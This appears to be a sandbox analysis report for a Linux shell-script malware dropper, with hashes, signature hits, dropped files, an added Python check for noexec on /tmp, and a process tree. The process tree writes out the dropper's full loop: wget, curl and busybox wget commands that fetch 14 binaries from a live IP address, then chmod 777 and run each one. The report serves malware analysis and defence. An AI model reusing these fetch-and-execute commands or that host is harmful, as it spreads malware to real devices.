Analysis
max time kernel: 38s
max time network: 45s
platform: debian-9_armhf
resource: debian9-armhf-20240611-en
resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 21/10/2024, 01:48
Static task
static1
Behavioral task
behavioral1
Sample
d9bdc45be8f672c6600b1fb26339db85ee21d8baad58f8a2fbb421bf697cd1df.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
d9bdc45be8f672c6600b1fb26339db85ee21d8baad58f8a2fbb421bf697cd1df.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
d9bdc45be8f672c6600b1fb26339db85ee21d8baad58f8a2fbb421bf697cd1df.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
d9bdc45be8f672c6600b1fb26339db85ee21d8baad58f8a2fbb421bf697cd1df.sh
Resource
debian9-mipsel-20240729-en
General
Target: d9bdc45be8f672c6600b1fb26339db85ee21d8baad58f8a2fbb421bf697cd1df.sh
Size: 10KB
MD5: 129ca570f400a031e8b2fff558e38eae
SHA1: d1a5686ea5940430161a4b56215e96e6a30d09b4
SHA256: d9bdc45be8f672c6600b1fb26339db85ee21d8baad58f8a2fbb421bf697cd1df
SHA512: 9ffbdb2ee7c1d682b47152222da7b962fb4babe280a71504038fe31ccbe5f7888945b0200d2979ea5f05b7b014160a0ad83d0a01debc76197266750fb26225b4
SSDEEP: 192:9XLtkt0tx2SQ2I1t1hg1d6+r6yrYD1tCtkt0tx2S9Jt1N6+r6yt:9XB0kx2SQ2I1t1hg17e1ty0kx2S9j1t
Malware Config
Signatures
-
File and Directory Permissions Modification (1 TTPs, 28 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Process: chmod in all 28 cases. pids (ascending): 679, 687, 709, 731, 752, 772, 792, 798, 804, 810, 816, 822, 830, 836, 842, 848, 854, 860, 866, 872, 883, 889, 895, 901, 907, 913, 919, 925
Every hit is the "chmod 777 <downloaded file>" step of the loop shown under Processes: the fetched file is made readable, writable and executable for every user so that the following "./<file>" succeeds whatever mode the fetcher created it with.
Executes dropped EXE (28 IoCs)
ioc (file executed), pid; the Process column is the file's basename in every row:
/tmp/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4  680
/tmp/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA  688
/tmp/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv  710
/tmp/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk  732
/tmp/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr  753
/tmp/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY  773
/tmp/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX  793
/tmp/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s  799
/tmp/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY  805
/tmp/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA  811
/tmp/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz  817
/tmp/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe  823
/tmp/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s  831
/tmp/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93  837
/tmp/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr  843
/tmp/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4  849
/tmp/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA  855
/tmp/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv  861
/tmp/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk  867
/tmp/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX  873
/tmp/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY  884
/tmp/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe  890
/tmp/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s  896
/tmp/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s  902
/tmp/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY  908
/tmp/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA  914
/tmp/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz  920
/tmp/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93  926
Each of the 14 file names is executed twice, once per download round.
Checks CPU configuration (1 TTPs, 28 IoCs)
Checks CPU information that can indicate whether the system is a virtual machine.
description: File opened for reading
ioc: /proc/cpuinfo
Process: curl (28 hits, one per curl invocation in the process tree)
The reader in every row is curl, not the script or any dropped file. A single read of /proc/cpuinfo at start-up is consistent with hardware-capability probing by the libraries curl links, so on this page the signature says nothing about evasion logic in the sample.
Reads runtime system information (56 IoCs: 28 reads of each file)
description: File opened for reading
ioc: /proc/self/auxv (28 hits) and /proc/sys/crypto/fips_enabled (28 hits)
Process: curl in every row
This is the signature the process tree labels "Reads runtime system information" on each curl child. As with /proc/cpuinfo, both files are opened by curl itself, once per invocation, which is consistent with hardware-capability and FIPS-mode probing by the libraries curl links rather than with anything the script does.
Writes file to tmp directory (28 IoCs)
Malware often drops required files in the /tmp directory.
description: File opened for modification
Process: curl in every row
ioc: each of the 14 dropped file names below appears twice, once per download round:
/tmp/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4
/tmp/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA
/tmp/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv
/tmp/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk
/tmp/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr
/tmp/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY
/tmp/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX
/tmp/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s
/tmp/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY
/tmp/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA
/tmp/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz
/tmp/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe
/tmp/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s
/tmp/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93
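The "write to /tmp, chmod 777, execute" sequence recorded above only works because /tmp on the sandbox image allows execution. The check below, an added example that is not part of the sandbox output or of the sample, parses a mount table in /proc/self/mounts format and reports which of the usual world-writable scratch directories lack the noexec/nosuid/nodev options. The mount table is constructed for the example; on a real host read /proc/self/mounts instead.

```python
"""Report scratch directories whose mount lacks noexec/nosuid/nodev.

Added example for this report; SAMPLE_MOUNTS is constructed in
/proc/self/mounts format and is not taken from the sandbox."""
import re

SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev,noexec,relatime 0 0
/dev/sda2 /var ext4 rw,relatime 0 0
"""

REQUIRED = ("noexec", "nosuid", "nodev")
SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


def _unescape(path):
    # The kernel writes spaces and other awkward bytes in mount points as
    # three-digit octal escapes (\040 for a space); decode them.
    return re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), path)


def parse_mounts(text):
    """Return {mount_point: set(options)} from /proc/self/mounts-style lines."""
    table = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:          # device, mount point, fstype, options, ...
            continue
        table[_unescape(parts[1])] = set(parts[3].split(","))
    return table


def mount_for(table, path):
    """Longest mount point that is a prefix of path, i.e. the mount that
    governs the path (the same resolution the kernel performs)."""
    best = "/"
    for point in table:
        if path == point or path.startswith(point.rstrip("/") + "/"):
            if len(point) > len(best):
                best = point
    return best


def missing_hardening(text, dirs=SCRATCH_DIRS):
    """Map each scratch directory to the options its mount lacks.
    An empty set means the directory is fully hardened."""
    table = parse_mounts(text)
    return {d: set(REQUIRED) - table.get(mount_for(table, d), set()) for d in dirs}


if __name__ == "__main__":
    for d, missing in missing_hardening(SAMPLE_MOUNTS).items():
        print(f"{d}: {'ok' if not missing else 'missing ' + ','.join(sorted(missing))}")
```

noexec on the mount makes execve and PROT_EXEC file mappings fail, so the "./<file>" step of this script would fail there; it does not stop an interpreter from reading a script out of /tmp, so it complements rather than replaces detection of the download loop itself.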
Processes
The tree is one parent shell with a flat list of children. For each of 14 file names the script tries wget, then curl -O, then busybox wget against the same URL on 87.120.84.230, marks the result executable with chmod 777, runs it from /tmp, and deletes it. Every name goes through this sequence twice (PIDs 650 to 838, then 839 to 927, in a different order the second time). Signature hits are shown in brackets: [CPU] Checks CPU configuration, [RSI] Reads runtime system information, [TMP] Writes file to tmp directory, [PERM] File and Directory Permissions Modification, [EXE] Executes dropped EXE.

PID 648  /tmp/d9bdc45be8f672c6600b1fb26339db85ee21d8baad58f8a2fbb421bf697cd1df.sh  (depth 1; every process below is a direct child, depth 2)
  PID 650  /bin/rm  rm bins.sh
  PID 653  /usr/bin/wget  wget http://87.120.84.230/bins/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4
  PID 669  /usr/bin/curl  curl -O http://87.120.84.230/bins/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4  [CPU][RSI][TMP]
  PID 676  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4
  PID 679  /bin/chmod  chmod 777 TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4  [PERM]
  PID 680  /tmp/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4  ./TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4  [EXE]
  PID 681  /bin/rm  rm TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4
  PID 682  /usr/bin/wget  wget http://87.120.84.230/bins/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA
  PID 683  /usr/bin/curl  curl -O http://87.120.84.230/bins/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA  [CPU][RSI][TMP]
  PID 684  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA
  PID 687  /bin/chmod  chmod 777 zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA  [PERM]
  PID 688  /tmp/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA  ./zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA  [EXE]
  PID 689  /bin/rm  rm zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA
  PID 691  /usr/bin/wget  wget http://87.120.84.230/bins/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv
  PID 696  /usr/bin/curl  curl -O http://87.120.84.230/bins/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv  [CPU][RSI][TMP]
  PID 704  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv
  PID 709  /bin/chmod  chmod 777 eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv  [PERM]
  PID 710  /tmp/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv  ./eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv  [EXE]
  PID 711  /bin/rm  rm eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv
  PID 713  /usr/bin/wget  wget http://87.120.84.230/bins/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk
  PID 719  /usr/bin/curl  curl -O http://87.120.84.230/bins/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk  [CPU][RSI][TMP]
  PID 725  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk
  PID 731  /bin/chmod  chmod 777 NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk  [PERM]
  PID 732  /tmp/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk  ./NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk  [EXE]
  PID 733  /bin/rm  rm NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk
  PID 735  /usr/bin/wget  wget http://87.120.84.230/bins/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr
  PID 748  /usr/bin/curl  curl -O http://87.120.84.230/bins/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr  [CPU][RSI][TMP]
  PID 749  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr
  PID 752  /bin/chmod  chmod 777 UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr  [PERM]
  PID 753  /tmp/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr  ./UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr  [EXE]
  PID 754  /bin/rm  rm UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr
  PID 755  /usr/bin/wget  wget http://87.120.84.230/bins/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY
  PID 761  /usr/bin/curl  curl -O http://87.120.84.230/bins/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY  [CPU][RSI][TMP]
  PID 767  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY
  PID 772  /bin/chmod  chmod 777 efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY  [PERM]
  PID 773  /tmp/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY  ./efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY  [EXE]
  PID 774  /bin/rm  rm efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY
  PID 776  /usr/bin/wget  wget http://87.120.84.230/bins/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX
  PID 782  /usr/bin/curl  curl -O http://87.120.84.230/bins/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX  [CPU][RSI][TMP]
  PID 788  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX
  PID 792  /bin/chmod  chmod 777 jbkBazKADCANOq2el15iaIH9fETZUnZ8iX  [PERM]
  PID 793  /tmp/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX  ./jbkBazKADCANOq2el15iaIH9fETZUnZ8iX  [EXE]
  PID 794  /bin/rm  rm jbkBazKADCANOq2el15iaIH9fETZUnZ8iX
  PID 795  /usr/bin/wget  wget http://87.120.84.230/bins/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s
  PID 796  /usr/bin/curl  curl -O http://87.120.84.230/bins/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s  [CPU][RSI][TMP]
  PID 797  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s
  PID 798  /bin/chmod  chmod 777 LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s  [PERM]
  PID 799  /tmp/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s  ./LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s  [EXE]
  PID 800  /bin/rm  rm LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s
  PID 801  /usr/bin/wget  wget http://87.120.84.230/bins/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY
  PID 802  /usr/bin/curl  curl -O http://87.120.84.230/bins/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY  [CPU][RSI][TMP]
  PID 803  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY
  PID 804  /bin/chmod  chmod 777 vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY  [PERM]
  PID 805  /tmp/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY  ./vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY  [EXE]
  PID 806  /bin/rm  rm vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY
  PID 807  /usr/bin/wget  wget http://87.120.84.230/bins/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA
  PID 808  /usr/bin/curl  curl -O http://87.120.84.230/bins/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA  [CPU][RSI][TMP]
  PID 809  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA
  PID 810  /bin/chmod  chmod 777 2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA  [PERM]
  PID 811  /tmp/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA  ./2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA  [EXE]
  PID 812  /bin/rm  rm 2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA
  PID 813  /usr/bin/wget  wget http://87.120.84.230/bins/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz
  PID 814  /usr/bin/curl  curl -O http://87.120.84.230/bins/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz  [CPU][RSI][TMP]
  PID 815  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz
  PID 816  /bin/chmod  chmod 777 oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz  [PERM]
  PID 817  /tmp/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz  ./oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz  [EXE]
  PID 818  /bin/rm  rm oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz
  PID 819  /usr/bin/wget  wget http://87.120.84.230/bins/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe
  PID 820  /usr/bin/curl  curl -O http://87.120.84.230/bins/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe  [CPU][RSI][TMP]
  PID 821  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe
  PID 822  /bin/chmod  chmod 777 BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe  [PERM]
  PID 823  /tmp/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe  ./BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe  [EXE]
  PID 824  /bin/rm  rm BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe
  PID 825  /usr/bin/wget  wget http://87.120.84.230/bins/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s
  PID 826  /usr/bin/curl  curl -O http://87.120.84.230/bins/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s  [CPU][RSI][TMP]
  PID 827  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s
  PID 830  /bin/chmod  chmod 777 jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s  [PERM]
  PID 831  /tmp/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s  ./jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s  [EXE]
  PID 832  /bin/rm  rm jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s
  PID 833  /usr/bin/wget  wget http://87.120.84.230/bins/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93
  PID 834  /usr/bin/curl  curl -O http://87.120.84.230/bins/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93  [CPU][RSI][TMP]
  PID 835  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93
  PID 836  /bin/chmod  chmod 777 OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93  [PERM]
  PID 837  /tmp/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93  ./OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93  [EXE]
  PID 838  /bin/rm  rm OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93
  PID 839  /usr/bin/wget  wget http://87.120.84.230/bins/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr
  PID 840  /usr/bin/curl  curl -O http://87.120.84.230/bins/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr  [CPU][RSI][TMP]
  PID 841  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr
  PID 842  /bin/chmod  chmod 777 UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr  [PERM]
  PID 843  /tmp/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr  ./UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr  [EXE]
  PID 844  /bin/rm  rm UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr
  PID 845  /usr/bin/wget  wget http://87.120.84.230/bins/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4
  PID 846  /usr/bin/curl  curl -O http://87.120.84.230/bins/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4  [CPU][RSI][TMP]
  PID 847  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4
  PID 848  /bin/chmod  chmod 777 TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4  [PERM]
  PID 849  /tmp/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4  ./TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4  [EXE]
  PID 850  /bin/rm  rm TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4
  PID 851  /usr/bin/wget  wget http://87.120.84.230/bins/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA
  PID 852  /usr/bin/curl  curl -O http://87.120.84.230/bins/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA  [CPU][RSI][TMP]
  PID 853  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA
  PID 854  /bin/chmod  chmod 777 zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA  [PERM]
  PID 855  /tmp/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA  ./zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA  [EXE]
  PID 856  /bin/rm  rm zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA
  PID 857  /usr/bin/wget  wget http://87.120.84.230/bins/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv
  PID 858  /usr/bin/curl  curl -O http://87.120.84.230/bins/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv  [CPU][RSI][TMP]
  PID 859  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv
  PID 860  /bin/chmod  chmod 777 eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv  [PERM]
  PID 861  /tmp/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv  ./eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv  [EXE]
  PID 862  /bin/rm  rm eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv
  PID 863  /usr/bin/wget  wget http://87.120.84.230/bins/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk
  PID 864  /usr/bin/curl  curl -O http://87.120.84.230/bins/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk  [CPU][RSI][TMP]
  PID 865  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk
  PID 866  /bin/chmod  chmod 777 NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk  [PERM]
  PID 867  /tmp/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk  ./NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk  [EXE]
  PID 868  /bin/rm  rm NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk
  PID 869  /usr/bin/wget  wget http://87.120.84.230/bins/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX
  PID 870  /usr/bin/curl  curl -O http://87.120.84.230/bins/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX  [CPU][RSI][TMP]
  PID 871  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX
  PID 872  /bin/chmod  chmod 777 jbkBazKADCANOq2el15iaIH9fETZUnZ8iX  [PERM]
  PID 873  /tmp/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX  ./jbkBazKADCANOq2el15iaIH9fETZUnZ8iX  [EXE]
  PID 874  /bin/rm  rm jbkBazKADCANOq2el15iaIH9fETZUnZ8iX
  PID 875  /usr/bin/wget  wget http://87.120.84.230/bins/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY
  PID 879  /usr/bin/curl  curl -O http://87.120.84.230/bins/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY  [CPU][RSI][TMP]
  PID 880  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY
  PID 883  /bin/chmod  chmod 777 efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY  [PERM]
  PID 884  /tmp/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY  ./efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY  [EXE]
  PID 885  /bin/rm  rm efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY
  PID 886  /usr/bin/wget  wget http://87.120.84.230/bins/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe
  PID 887  /usr/bin/curl  curl -O http://87.120.84.230/bins/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe  [CPU][RSI][TMP]
  PID 888  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe
  PID 889  /bin/chmod  chmod 777 BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe  [PERM]
  PID 890  /tmp/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe  ./BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe  [EXE]
  PID 891  /bin/rm  rm BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe
  PID 892  /usr/bin/wget  wget http://87.120.84.230/bins/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s
  PID 893  /usr/bin/curl  curl -O http://87.120.84.230/bins/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s  [CPU][RSI][TMP]
  PID 894  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s
  PID 895  /bin/chmod  chmod 777 jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s  [PERM]
  PID 896  /tmp/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s  ./jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s  [EXE]
  PID 897  /bin/rm  rm jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s
  PID 898  /usr/bin/wget  wget http://87.120.84.230/bins/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s
  PID 899  /usr/bin/curl  curl -O http://87.120.84.230/bins/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s  [CPU][RSI][TMP]
  PID 900  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s
  PID 901  /bin/chmod  chmod 777 LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s  [PERM]
  PID 902  /tmp/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s  ./LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s  [EXE]
  PID 903  /bin/rm  rm LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s
  PID 904  /usr/bin/wget  wget http://87.120.84.230/bins/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY
  PID 905  /usr/bin/curl  curl -O http://87.120.84.230/bins/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY  [CPU][RSI][TMP]
  PID 906  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY
  PID 907  /bin/chmod  chmod 777 vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY  [PERM]
  PID 908  /tmp/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY  ./vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY  [EXE]
  PID 909  /bin/rm  rm vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY
  PID 910  /usr/bin/wget  wget http://87.120.84.230/bins/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA
  PID 911  /usr/bin/curl  curl -O http://87.120.84.230/bins/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA  [CPU][RSI][TMP]
  PID 912  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA
  PID 913  /bin/chmod  chmod 777 2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA  [PERM]
